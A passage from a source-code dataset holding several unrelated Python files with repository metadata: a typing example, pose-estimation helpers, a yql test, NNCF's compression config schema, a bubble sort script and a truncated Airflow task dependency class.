lecture_5/07/typing2.py
|
darinabird/python_developer
|
7141c9e4d0deb5f2943d70eaf189316631942e56
|
[
"CC0-1.0"
] | 47
|
2020-03-04T17:31:26.000Z
|
2022-03-13T15:40:27.000Z
|
from typing import Union, Dict
def some_func(arg: Union[Dict[str, str], str]) -> int:
return len(arg)
some_func({"a": "b"})
some_func("abc")
some_func({"a": 1})
| 18.555556
| 54
| 0.640719
|
474ba8f0da949dd5937f968dab287593e5eb0abf
| 4,577
|
py
|
Python
|
tf_pose/common.py
|
McgBcg/MomchigiBakchigi
|
97084b44e80852503827816c64f0eb4fdf81b1a5
|
[
"Apache-2.0"
] | 1
|
2021-02-03T11:23:32.000Z
|
2021-02-03T11:23:32.000Z
|
tf_pose/common.py
|
McgBcg/MomchigiBakchigi
|
97084b44e80852503827816c64f0eb4fdf81b1a5
|
[
"Apache-2.0"
] | null | null | null |
tf_pose/common.py
|
McgBcg/MomchigiBakchigi
|
97084b44e80852503827816c64f0eb4fdf81b1a5
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:32:36.000Z
|
2021-02-04T03:32:36.000Z
|
from enum import Enum
import tensorflow as tf
import cv2
regularizer_conv = 0.004
regularizer_dsconv = 0.0004
batchnorm_fused = True
activation_fn = tf.nn.relu
class CocoPart(Enum):
Nose = 0
Neck = 1
RShoulder = 2
RElbow = 3
RWrist = 4
LShoulder = 5
LElbow = 6
LWrist = 7
RHip = 8
RKnee = 9
RAnkle = 10
LHip = 11
LKnee = 12
LAnkle = 13
REye = 14
LEye = 15
REar = 16
LEar = 17
Background = 18
class MPIIPart(Enum):
RAnkle = 0
RKnee = 1
RHip = 2
LHip = 3
LKnee = 4
LAnkle = 5
RWrist = 6
RElbow = 7
RShoulder = 8
LShoulder = 9
LElbow = 10
LWrist = 11
Neck = 12
Head = 13
@staticmethod
def from_coco(human):
# t = {
# MPIIPart.RAnkle: CocoPart.RAnkle,
# MPIIPart.RKnee: CocoPart.RKnee,
# MPIIPart.RHip: CocoPart.RHip,
# MPIIPart.LHip: CocoPart.LHip,
# MPIIPart.LKnee: CocoPart.LKnee,
# MPIIPart.LAnkle: CocoPart.LAnkle,
# MPIIPart.RWrist: CocoPart.RWrist,
# MPIIPart.RElbow: CocoPart.RElbow,
# MPIIPart.RShoulder: CocoPart.RShoulder,
# MPIIPart.LShoulder: CocoPart.LShoulder,
# MPIIPart.LElbow: CocoPart.LElbow,
# MPIIPart.LWrist: CocoPart.LWrist,
# MPIIPart.Neck: CocoPart.Neck,
# MPIIPart.Nose: CocoPart.Nose,
# }
t = [
(MPIIPart.Head, CocoPart.Nose),
(MPIIPart.Neck, CocoPart.Neck),
(MPIIPart.RShoulder, CocoPart.RShoulder),
(MPIIPart.RElbow, CocoPart.RElbow),
(MPIIPart.RWrist, CocoPart.RWrist),
(MPIIPart.LShoulder, CocoPart.LShoulder),
(MPIIPart.LElbow, CocoPart.LElbow),
(MPIIPart.LWrist, CocoPart.LWrist),
(MPIIPart.RHip, CocoPart.RHip),
(MPIIPart.RKnee, CocoPart.RKnee),
(MPIIPart.RAnkle, CocoPart.RAnkle),
(MPIIPart.LHip, CocoPart.LHip),
(MPIIPart.LKnee, CocoPart.LKnee),
(MPIIPart.LAnkle, CocoPart.LAnkle),
]
pose_2d_mpii = []
        visibility = []
        for mpi, coco in t:
            if coco.value not in human.body_parts.keys():
                pose_2d_mpii.append((0, 0))
                visibility.append(False)
                continue
            pose_2d_mpii.append((human.body_parts[coco.value].x, human.body_parts[coco.value].y))
            visibility.append(True)
        return pose_2d_mpii, visibility
CocoPairs = [
(1, 2), (1, 5), (2, 3), (3, 4), (5, 6), (6, 7), (1, 8), (8, 9), (9, 10), (1, 11),
(11, 12), (12, 13), (1, 0), (0, 14), (14, 16), (0, 15), (15, 17), (2, 16), (5, 17)
] # = 19
CocoPairsRender = CocoPairs[:-2]
# CocoPairsNetwork = [
# (12, 13), (20, 21), (14, 15), (16, 17), (22, 23), (24, 25), (0, 1), (2, 3), (4, 5),
# (6, 7), (8, 9), (10, 11), (28, 29), (30, 31), (34, 35), (32, 33), (36, 37), (18, 19), (26, 27)
# ] # = 19
class TestColor:
CocoColors = [[255, 0, 0],
[0, 0, 0],
[0, 0, 0],
[255, 102, 0],
[255, 255, 0],
[0, 0, 0],
[255, 102, 0],
[255, 255, 0],
[0, 153, 0],
[0, 0, 0],
[0, 0, 255],
[0, 153, 0],
[0, 0, 0],
[0, 0, 255],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]
def read_imgfile(path, width=None, height=None):
val_image = cv2.imread(path, cv2.IMREAD_COLOR)
if width is not None and height is not None:
val_image = cv2.resize(val_image, (width, height))
return val_image
def get_sample_images(w, h):
val_image = [
read_imgfile('./images/p1.jpg', w, h),
read_imgfile('./images/p2.jpg', w, h),
read_imgfile('./images/p3.jpg', w, h),
read_imgfile('./images/golf.jpg', w, h),
read_imgfile('./images/hand1.jpg', w, h),
read_imgfile('./images/hand2.jpg', w, h),
read_imgfile('./images/apink1_crop.jpg', w, h),
read_imgfile('./images/ski.jpg', w, h),
read_imgfile('./images/apink2.jpg', w, h),
read_imgfile('./images/apink3.jpg', w, h),
read_imgfile('./images/handsup1.jpg', w, h),
read_imgfile('./images/p3_dance.png', w, h),
]
return val_image
def to_str(s):
if not isinstance(s, str):
return s.decode('utf-8')
return s
| 29.152866
| 100
| 0.502731
|
f5eda41b005dd08d583a37f3eea3d4097f62d86e
| 239
|
py
|
Python
|
tests/test_mapper.py
|
sourcepirate/yql
|
16ebf3674cef74e0b15e026dbcb69d500e3cafd9
|
[
"MIT"
] | 1
|
2015-10-26T09:26:14.000Z
|
2015-10-26T09:26:14.000Z
|
tests/test_mapper.py
|
plasmashadow/yql
|
16ebf3674cef74e0b15e026dbcb69d500e3cafd9
|
[
"MIT"
] | 2
|
2015-09-17T03:04:42.000Z
|
2016-11-27T03:34:31.000Z
|
tests/test_mapper.py
|
sourcepirate/yql
|
16ebf3674cef74e0b15e026dbcb69d500e3cafd9
|
[
"MIT"
] | 4
|
2015-08-24T11:25:14.000Z
|
2016-11-10T04:30:29.000Z
|
import unittest
from yql.api._api_mapper import ObjectMapper
class TestMapper(unittest.TestCase):
def test_mapper(self):
a = {"a":"b", "c":{"d":"3"}}
obj = ObjectMapper(a)
self.assertEqual(obj.c.d,"3")
| 14.058824
| 44
| 0.606695
|
fc61d387f37723a0e84038de5d4ce4ab7bcba8eb
| 37,550
|
py
|
Python
|
nncf/config_schema.py
|
AbraInsight/nncf_pytorch
|
5e8d72d5e2f0c30da05d95cd9c3b3d8832ac8572
|
[
"Apache-2.0"
] | null | null | null |
nncf/config_schema.py
|
AbraInsight/nncf_pytorch
|
5e8d72d5e2f0c30da05d95cd9c3b3d8832ac8572
|
[
"Apache-2.0"
] | null | null | null |
nncf/config_schema.py
|
AbraInsight/nncf_pytorch
|
5e8d72d5e2f0c30da05d95cd9c3b3d8832ac8572
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from typing import Dict
import jsonschema
logger = logging.getLogger('nncf')
def make_string_or_array_of_strings_schema(addtl_dict_entries: Dict = None) -> Dict:
if addtl_dict_entries is None:
addtl_dict_entries = {}
retval = {
"type": ["array", "string"],
"items": {
"type": "string"
}
}
retval.update(addtl_dict_entries)
return retval
def make_object_or_array_of_objects_schema(single_object_schema: Dict = None) -> Dict:
retval = {
"oneOf": [
{
"type": "array",
"items": single_object_schema
},
single_object_schema
]
}
return retval
def with_attributes(schema: Dict, **kwargs) -> Dict:
retval = {**schema, **kwargs}
return retval
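# Illustrative example (editor-added): with_attributes() merely merges extra JSON-schema keywords
# into a base type schema, e.g.
#   with_attributes({"type": "number"}, description="Batch size")
#   == {"type": "number", "description": "Batch size"}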
_NUMBER = {
"type": "number"
}
_STRING = {
"type": "string"
}
_BOOLEAN = {
"type": "boolean"
}
_ARRAY_OF_NUMBERS = {
"type": "array",
"items": _NUMBER
}
_ARRAY_OF_STRINGS = {
"type": "array",
"items": _STRING
}
SINGLE_INPUT_INFO_SCHEMA = {
"type": "object",
"properties": {
"sample_size": with_attributes(_ARRAY_OF_NUMBERS,
description="Shape of the tensor expected as input to the model.",
examples=[[1, 3, 224, 224]]),
"type": with_attributes(_STRING,
description="Data type of the model input tensor."),
"filler": with_attributes(_STRING,
description="Determines what the tensor will be filled with when passed to the model"
" during tracing and exporting."),
"keyword": with_attributes(_STRING,
description="Keyword to be used when passing the tensor to the model's "
"'forward' method.")
},
"additionalProperties": False
}
QUANTIZER_CONFIG_PROPERTIES = {
"mode": with_attributes(_STRING,
description="Mode of quantization"),
"bits": with_attributes(_NUMBER,
description="Bitwidth to quantize to."),
"signed": with_attributes(_BOOLEAN,
description="Whether to use signed or unsigned input/output values for quantization."
" If specified as unsigned and the input values during initialization have "
"differing signs, will reset to performing signed quantization instead."),
"per_channel": with_attributes(_BOOLEAN,
description="Whether to quantize inputs per channel (i.e. per 0-th dimension for "
"weight quantization, and per 1-st dimension for activation "
"quantization)")
}
IGNORED_SCOPES_DESCRIPTION = "A list of model control flow graph node scopes to be ignored for this " \
"operation - functions as a 'blacklist'. Optional."
TARGET_SCOPES_DESCRIPTION = "A list of model control flow graph node scopes to be considered for this operation" \
" - functions as a 'whitelist'. Optional."
QUANTIZER_GROUP_PROPERTIES = {
**QUANTIZER_CONFIG_PROPERTIES,
"ignored_scopes": with_attributes(make_object_or_array_of_objects_schema(_STRING),
description=IGNORED_SCOPES_DESCRIPTION),
"target_scopes": with_attributes(make_object_or_array_of_objects_schema(_STRING),
description=TARGET_SCOPES_DESCRIPTION)
}
WEIGHTS_GROUP_SCHEMA = {
"type": "object",
"properties": {
**QUANTIZER_GROUP_PROPERTIES,
},
"additionalProperties": False
}
LINKED_ACTIVATION_SCOPES_SPECIFIER_SCHEMA = {
"type": "array",
"items": _ARRAY_OF_STRINGS
}
ACTIVATIONS_GROUP_SCHEMA = {
"type": "object",
"properties": {
**QUANTIZER_GROUP_PROPERTIES,
"linked_quantizer_scopes": with_attributes(LINKED_ACTIVATION_SCOPES_SPECIFIER_SCHEMA,
description="Specifies points in the model which will share the "
"same quantizer module for activations. This is helpful "
"in case one and the same quantizer scale is required "
"for inputs to the same operation. Each sub-array will"
"define a group of activation quantizer insertion "
"points that have to share a single actual "
"quantization module, each entry in this subarray "
"should correspond to exactly one node in the NNCF "
"graph and the groups should not overlap. The final"
"quantizer for each sub-array will be associated with "
"the first element of this sub-array.")
},
"additionalProperties": False
}
GENERIC_INITIALIZER_SCHEMA = {
"type": "object",
"properties": {
"batchnorm_adaptation":
{
"type": "object",
"properties": {
"num_bn_adaptation_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"procedure for the compressed model"),
"num_bn_forget_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"in the initial statistics forgetting step"),
},
"additionalProperties": False,
},
},
"additionalProperties": False,
}
RANGE_INIT_CONFIG_PROPERTIES = {
"initializer": {
"type": "object",
"properties": {
"range": {
"type": "object",
"properties": {
"num_init_steps": with_attributes(_NUMBER,
description="Number of batches from the training dataset to "
"consume as sample model inputs for purposes of "
"setting initial minimum and maximum quantization "
"ranges"),
"type": with_attributes(_STRING, description="Type of the initializer - determines which "
"statistics gathered during initialization will be "
"used to initialize the quantization ranges"),
"min_percentile": with_attributes(_NUMBER,
description="For 'percentile' type - specify the percentile of "
"input value histograms to be set as the initial "
"value for minimum quantizer input"),
"max_percentile": with_attributes(_NUMBER,
description="For 'percentile' type - specify the percentile of "
"input value histograms to be set as the initial "
"value for maximum quantizer input"),
},
"additionalProperties": False,
},
},
"additionalProperties": False,
},
}
QUANTIZATION_INITIALIZER_SCHEMA = {
"type": "object",
"properties": {
"batchnorm_adaptation":
{
"type": "object",
"properties": {
"num_bn_adaptation_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"procedure for the compressed model"),
"num_bn_forget_steps": with_attributes(_NUMBER,
description="Number of batches from the training "
"dataset to use for model inference during "
"the BatchNorm statistics adaptation "
"in the initial statistics forgetting step"),
},
"additionalProperties": False,
},
**RANGE_INIT_CONFIG_PROPERTIES["initializer"]["properties"],
"precision":
{
"type": "object",
"properties": {
"type": with_attributes(_STRING,
description="Type of precision initialization."),
"bits": with_attributes(_ARRAY_OF_NUMBERS,
description="A list of bitwidth to choose from when "
"performing precision initialization.",
examples=[[4, 8]]),
"num_data_points": with_attributes(_NUMBER,
description="Number of data points to iteratively estimate "
"Hessian trace, 200 by default."),
"iter_number": with_attributes(_NUMBER,
description="Maximum number of iterations of Hutchinson algorithm "
"to Estimate Hessian trace, 200 by default"),
"tolerance": with_attributes(_NUMBER,
description="Minimum relative tolerance for stopping the Hutchinson "
"algorithm. It's calculated between mean average trace "
"from previous iteration and current one. 1e-5 by default"
"bitwidth_per_scope"),
"bitwidth_per_scope": {
"type": "array",
"items": {
"type": "array",
"items":
[
_NUMBER,
_STRING
],
"description": "A tuple of a bitwidth and a scope of the quantizer to assign the "
"bitwidth to."
},
"description": "Manual settings for the quantizer bitwidths. Scopes are used to identify "
"the quantizers."
}
},
"additionalProperties": False,
}
},
"additionalProperties": False,
}
COMMON_COMPRESSION_ALGORITHM_PROPERTIES = {
"ignored_scopes": with_attributes(make_string_or_array_of_strings_schema(),
description=IGNORED_SCOPES_DESCRIPTION),
"target_scopes": with_attributes(make_string_or_array_of_strings_schema(),
description=TARGET_SCOPES_DESCRIPTION),
}
BASIC_COMPRESSION_ALGO_SCHEMA = {
"type": "object",
"required": ["algorithm"]
}
STAGED_QUANTIZATION_PARAMS = {
"params": {
"type": "object",
"properties": {
"batch_multiplier": with_attributes(_NUMBER,
description="Gradients will be accumulated for this number of "
"batches before doing a 'backward' call. Increasing "
"this may improve training quality, since binarized "
"networks exhibit noisy gradients requiring larger "
"batch sizes than could be accomodated by GPUs"),
"activations_quant_start_epoch": with_attributes(_NUMBER,
description="Epoch to start binarizing activations"),
"weights_quant_start_epoch": with_attributes(_NUMBER,
description="Epoch to start binarizing weights"),
"lr_poly_drop_start_epoch": with_attributes(_NUMBER,
description="Epoch to start dropping the learning rate"),
"lr_poly_drop_duration_epochs": with_attributes(_NUMBER,
description="Duration, in epochs, of the learning "
"rate dropping process."),
"disable_wd_start_epoch": with_attributes(_NUMBER,
description="Epoch to disable weight decay in the optimizer"),
"base_lr": with_attributes(_NUMBER, description="Initial value of learning rate"),
"base_wd": with_attributes(_NUMBER, description="Initial value of weight decay"),
},
"additionalProperties": False
}
}
QUANTIZATION_ALGO_NAME_IN_CONFIG = "quantization"
QUANTIZATION_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": QUANTIZATION_ALGO_NAME_IN_CONFIG
},
"initializer": QUANTIZATION_INITIALIZER_SCHEMA,
"weights": with_attributes(WEIGHTS_GROUP_SCHEMA,
description="Constraints to be applied to model weights quantization only. "
"Overrides higher-level settings."),
"activations": with_attributes(ACTIVATIONS_GROUP_SCHEMA,
description="Constraints to be applied to model activations quantization only. "
"Overrides higher-level settings."),
"quantize_inputs": with_attributes(_BOOLEAN,
description="Whether the model inputs should be immediately quantized prior "
"to any other model operations.",
default=True),
"quantize_outputs": with_attributes(_BOOLEAN,
description="Whether the model outputs should be additionally quantized.",
default=False),
"quantizable_subgraph_patterns": {
"type": "array",
"items": make_string_or_array_of_strings_schema(),
"description": "Each sub-list in this list will correspond to a sequence of operations in the "
"model control flow graph that will have a quantizer appended at the end of the "
"sequence",
"examples": [["cat", "batch_norm"], "h_swish"]
},
"scope_overrides": {
"type": "object",
"patternProperties": {
".*": {
"type": "object",
"properties": {
**QUANTIZER_CONFIG_PROPERTIES,
**RANGE_INIT_CONFIG_PROPERTIES,
},
"additionalProperties": False
},
},
"description": "This option is used to specify overriding quantization constraints for specific scope,"
"e.g. in case you need to quantize a single operation differently than the rest of the "
"model."
},
"export_to_onnx_standard_ops": with_attributes(_BOOLEAN,
description="Determines how should the additional quantization "
"operations be exported into the ONNX format. Set "
"this to false for export to OpenVINO-supported "
"FakeQuantize ONNX, or to true for export to ONNX "
"standard QuantizeLinear-DequantizeLinear "
"node pairs (8-bit quantization only in the latter "
"case). Default: false"),
**STAGED_QUANTIZATION_PARAMS,
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES,
},
"additionalProperties": False
}
BINARIZATION_ALGO_NAME_IN_CONFIG = "binarization"
BINARIZATION_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": BINARIZATION_ALGO_NAME_IN_CONFIG
},
"initializer": QUANTIZATION_INITIALIZER_SCHEMA,
"mode": with_attributes(_STRING,
description="Selects the mode of binarization - either 'xnor' for XNOR binarization,"
"or 'dorefa' for DoReFa binarization"),
**STAGED_QUANTIZATION_PARAMS,
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
CONST_SPARSITY_ALGO_NAME_IN_CONFIG = "const_sparsity"
CONST_SPARSITY_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": CONST_SPARSITY_ALGO_NAME_IN_CONFIG
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES,
},
"additionalProperties": False,
"description": "This algorithm takes no additional parameters and is used when you want to load "
"a checkpoint trained with another sparsity algorithm and do other compression without "
"changing the sparsity mask."
}
COMMON_SPARSITY_PARAM_PROPERTIES = {
"schedule": with_attributes(_STRING,
description="The type of scheduling to use for adjusting the target"
"sparsity level"),
"patience": with_attributes(_NUMBER,
description="A regular patience parameter for the scheduler, "
"as for any other standard scheduler. Specified in units "
"of scheduler steps."),
"power": with_attributes(_NUMBER,
description="For polynomial scheduler - determines the corresponding power value."),
"concave": with_attributes(_BOOLEAN, description="For polynomial scheduler - if True, then the target sparsity "
"level will be approached in concave manner, and in convex "
"manner otherwise."),
"sparsity_init": with_attributes(_NUMBER,
description="Initial value of the sparsity level applied to the "
"model"),
"sparsity_target": with_attributes(_NUMBER,
description="Target value of the sparsity level for the model"),
"sparsity_target_epoch": with_attributes(_NUMBER,
description="The target sparsity value will be reached after this many"
"epoch steps"),
"sparsity_freeze_epoch": with_attributes(_NUMBER,
description="The number of epoch steps after which the "
"sparsity mask will be frozen and no "
"longer trained"),
"update_per_optimizer_step": with_attributes(_BOOLEAN,
description="Whether the function-based sparsity level schedulers "
"should update the sparsity level after each optimizer "
"step instead of each epoch step."),
"steps_per_epoch": with_attributes(_NUMBER,
description="Number of optimizer steps in one epoch. Required to start proper "
" scheduling in the first training epoch if "
"'update_per_optimizer_step' is true"),
"multistep_steps": with_attributes(_ARRAY_OF_NUMBERS,
description="A list of scheduler steps at which to transition "
"to the next scheduled sparsity level (multistep "
"scheduler only)."),
"multistep_sparsity_levels": with_attributes(_ARRAY_OF_NUMBERS,
description="Levels of sparsity to use at each step "
"of the scheduler as specified in the "
"'multistep_steps' attribute. The first"
"sparsity level will be applied "
"immediately, so the length of this list "
"should be larger than the length of the "
"'steps' by one.")
}
MAGNITUDE_SPARSITY_ALGO_NAME_IN_CONFIG = "magnitude_sparsity"
MAGNITUDE_SPARSITY_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": MAGNITUDE_SPARSITY_ALGO_NAME_IN_CONFIG
},
"initializer": GENERIC_INITIALIZER_SCHEMA,
"params":
{
"type": "object",
"properties": {
**COMMON_SPARSITY_PARAM_PROPERTIES,
"weight_importance": with_attributes(_STRING,
description="Determines the way in which the weight values "
"will be sorted after being aggregated in order "
"to determine the sparsity threshold "
"corresponding to a specific sparsity level. "
"Either 'abs' or 'normed_abs'.",
default="normed_abs")
},
"additionalProperties": False
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
RB_SPARSITY_ALGO_NAME_IN_CONFIG = "rb_sparsity"
RB_SPARSITY_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": RB_SPARSITY_ALGO_NAME_IN_CONFIG
},
"params":
{
"type": "object",
"properties": COMMON_SPARSITY_PARAM_PROPERTIES,
"additionalProperties": False
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
FILTER_PRUNING_ALGO_NAME_IN_CONFIG = 'filter_pruning'
FILTER_PRUNING_SCHEMA = {
**BASIC_COMPRESSION_ALGO_SCHEMA,
"properties": {
"algorithm": {
"const": FILTER_PRUNING_ALGO_NAME_IN_CONFIG
},
"initializer": GENERIC_INITIALIZER_SCHEMA,
"params":
{
"type": "object",
"properties": {
"schedule": with_attributes(_STRING,
description="The type of scheduling to use for adjusting the target"
" pruning level. Either `exponential`, `exponential_with"
"_bias`, or `baseline`, by default it is `baseline`"),
"pruning_init": with_attributes(_NUMBER,
description="Initial value of the pruning level applied to the"
" model. 0.0 by default."),
"pruning_target": with_attributes(_NUMBER,
description="Target value of the pruning level for the model."
" 0.5 by default."),
"num_init_steps": with_attributes(_NUMBER,
description="Number of epochs for model pretraining before"
" starting filter pruning. 0 by default."),
"pruning_steps": with_attributes(_NUMBER,
description="Number of epochs during which the pruning rate is"
" increased from `pruning_init` to `pruning_target`"
" value."),
"weight_importance": with_attributes(_STRING,
description="The type of filter importance metric. Can be"
" one of `L1`, `L2`, `geometric_median`."
" `L2` by default."),
"all_weights": with_attributes(_BOOLEAN,
description="Whether to prune layers independently (choose filters"
" with the smallest importance in each layer separately)"
" or not. `False` by default.",
default=False),
"prune_first_conv": with_attributes(_BOOLEAN,
description="Whether to prune first Convolutional layers or"
" not. First means that it is a convolutional layer"
" such that there is a path from model input to "
"this layer such that there are no other "
"convolution operations on it. `False` by default.",
default=False
),
"prune_last_conv": with_attributes(_BOOLEAN,
description="whether to prune last Convolutional layers or not."
" Last means that it is a Convolutional layer such"
" that there is a path from this layer to the model"
" output such that there are no other convolution"
" operations on it. `False` by default. ",
default=False
),
"prune_downsample_convs": with_attributes(_BOOLEAN,
description="whether to prune downsample Convolutional"
" layers (with stride > 1) or not. `False`"
" by default.",
default=False
),
"prune_batch_norms": with_attributes(_BOOLEAN,
description="whether to nullifies parameters of Batch Norm"
" layer corresponds to zeroed filters of"
" convolution corresponding to this Batch Norm."
" `False` by default.",
default=False
),
"zero_grad": with_attributes(_BOOLEAN,
description="Whether to setting gradients corresponding to zeroed"
" filters to zero during training, `True` by default.",
default=True),
},
"additionalProperties": False,
},
**COMMON_COMPRESSION_ALGORITHM_PROPERTIES
},
"additionalProperties": False
}
ALL_SUPPORTED_ALGO_SCHEMAE = [BINARIZATION_SCHEMA,
QUANTIZATION_SCHEMA,
CONST_SPARSITY_SCHEMA,
MAGNITUDE_SPARSITY_SCHEMA,
RB_SPARSITY_SCHEMA,
FILTER_PRUNING_SCHEMA]
REF_VS_ALGO_SCHEMA = {BINARIZATION_ALGO_NAME_IN_CONFIG: BINARIZATION_SCHEMA,
QUANTIZATION_ALGO_NAME_IN_CONFIG: QUANTIZATION_SCHEMA,
CONST_SPARSITY_ALGO_NAME_IN_CONFIG: CONST_SPARSITY_SCHEMA,
MAGNITUDE_SPARSITY_ALGO_NAME_IN_CONFIG: MAGNITUDE_SPARSITY_SCHEMA,
RB_SPARSITY_ALGO_NAME_IN_CONFIG: RB_SPARSITY_SCHEMA,
FILTER_PRUNING_ALGO_NAME_IN_CONFIG: FILTER_PRUNING_SCHEMA}
ROOT_NNCF_CONFIG_SCHEMA = {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": "object",
"properties": {
"input_info": with_attributes(make_object_or_array_of_objects_schema(SINGLE_INPUT_INFO_SCHEMA),
description="Required - describe the specifics of your model inputs here."
"This information is used to build the internal graph representation"
"that is leveraged for proper compression functioning, and for "
"exporting the compressed model to ONNX."),
"disable_shape_matching": with_attributes(_BOOLEAN,
description="Whether to enable strict input tensor"
"shape matching when building the internal graph"
"representation of the model. Set this to false if your"
"model inputs have any variable dimension other than "
"the 0-th (batch) dimension, or if any non-batch "
"dimension of the intermediate tensors in your model "
"execution flow depends on the input dimension,"
"otherwise the compression will most likely fail."),
# Validation of each separate compression description schema occurs in a separate step.
# This is required for better user feedback, since holistic schema validation is uninformative
# if there is an error in one of the compression configs.
"compression": make_object_or_array_of_objects_schema(BASIC_COMPRESSION_ALGO_SCHEMA),
"hw_config_type": with_attributes(_STRING,
description="If specified, the compression algorithms will use parameter "
"presets that are more likely to result in best performance on "
"a given HW type."),
"log_dir": with_attributes(_STRING,
description="Log directory for NNCF-specific logging outputs"),
"quantizer_setup_type": with_attributes(_STRING,
description="Selects the mode of placement quantizers - either "
"'pattern_based' or 'propagation_based'. "
"In 'pattern_based' mode, the quantizers are placed "
"according to the accepted patterns (Each pattern is "
"a layer or a set of layers to be quantized). "
"In 'propagation_based' initially quantizers are placed "
"on all possible quantized layers and then the algorithm "
"their propagation is run from the bottom up. Also in "
"this mode it is possible to use hw config."),
},
"required": ["input_info"],
"definitions": REF_VS_ALGO_SCHEMA,
"dependencies": {
"hw_config_type": {
"properties": {
"quantizer_setup_type": { "const": "propagation_based"}}
}
}
}
def validate_single_compression_algo_schema(single_compression_algo_dict: Dict):
"""single_compression_algo_dict must conform to BASIC_COMPRESSION_ALGO_SCHEMA (and possibly has other
algo-specific properties"""
algo_name = single_compression_algo_dict["algorithm"]
if algo_name not in REF_VS_ALGO_SCHEMA:
raise jsonschema.ValidationError(
"Incorrect algorithm name - must be one of ({})".format(", ".join(REF_VS_ALGO_SCHEMA.keys())))
try:
jsonschema.validate(single_compression_algo_dict, schema=REF_VS_ALGO_SCHEMA[algo_name])
except Exception as e:
import sys
raise type(e)("For algorithm: '{}'\n".format(algo_name) + str(e)).with_traceback(sys.exc_info()[2])
| 57.415902
| 120
| 0.463249
|
55525f956af9d66ba722c4708c2d15e81ed5cd6d
| 918
|
py
|
Python
|
bubbleSort.py
|
ManishSreerangam/SortingAlgorithms
|
542b729353e2740e8baa6e88ac1adc8bd84dfd43
|
[
"Apache-2.0"
] | null | null | null |
bubbleSort.py
|
ManishSreerangam/SortingAlgorithms
|
542b729353e2740e8baa6e88ac1adc8bd84dfd43
|
[
"Apache-2.0"
] | null | null | null |
bubbleSort.py
|
ManishSreerangam/SortingAlgorithms
|
542b729353e2740e8baa6e88ac1adc8bd84dfd43
|
[
"Apache-2.0"
] | null | null | null |
"""
Bubble sort : The bubble sort algorithm repeatedly scans through the list,
comparing adjacent elements and swapping them if they are in the wrong order.
"""
def bubble(list1):
    n = len(list1)
    for i in range(1, n):  # number of passes: n-1 passes in total
        for j in range(0, n - i):  # compare adjacent items; the last i items are already in place
            if list1[j] > list1[j + 1]:
                temp = list1[j]
                list1[j] = list1[j + 1]
                list1[j + 1] = temp
    print(list1)
x = int(input("Enter the total number of elements in a list : "))
list1 = []
for i in range(x):  # reading the list values
    list1.append(int(input("Enter number {} \t ".format(i + 1))))  # convert to int so the sort is numeric, not lexicographic
bubble(list1)
"""
Order of growth ----> Quadratic ----> BIG O (n^2)
The algorithm is best suited to smaller data sets.
"""
| 38.25
| 121
| 0.570806
|
5f3530c2b5fc9b1bb4c839fe57e5967423721571
| 3,125
|
py
|
Python
|
airflow/ti_deps/deps/ready_to_reschedule.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 1
|
2020-09-15T02:32:55.000Z
|
2020-09-15T02:32:55.000Z
|
airflow/ti_deps/deps/ready_to_reschedule.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 20
|
2021-01-23T12:33:08.000Z
|
2021-12-07T22:30:37.000Z
|
airflow/ti_deps/deps/ready_to_reschedule.py
|
daemon-demon/airflow
|
6f96e81f0123b30750fb68ec496246023bf63f35
|
[
"Apache-2.0"
] | 2
|
2020-03-08T14:12:55.000Z
|
2020-06-10T10:17:32.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.models.taskreschedule import TaskReschedule
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.utils import timezone
from airflow.utils.session import provide_session
from airflow.utils.state import State
class ReadyToRescheduleDep(BaseTIDep):
"""
Determines whether a task is ready to be rescheduled.
"""
NAME = "Ready To Reschedule"
IGNOREABLE = True
IS_TASK_DEP = True
RESCHEDULEABLE_STATES = {State.UP_FOR_RESCHEDULE, State.NONE}
@provide_session
def _get_dep_statuses(self, ti, session, dep_context):
"""
Determines whether a task is ready to be rescheduled. Only tasks in
NONE state with at least one row in task_reschedule table are
handled by this dependency class, otherwise this dependency is
considered as passed. This dependency fails if the latest reschedule
request's reschedule date is still in future.
"""
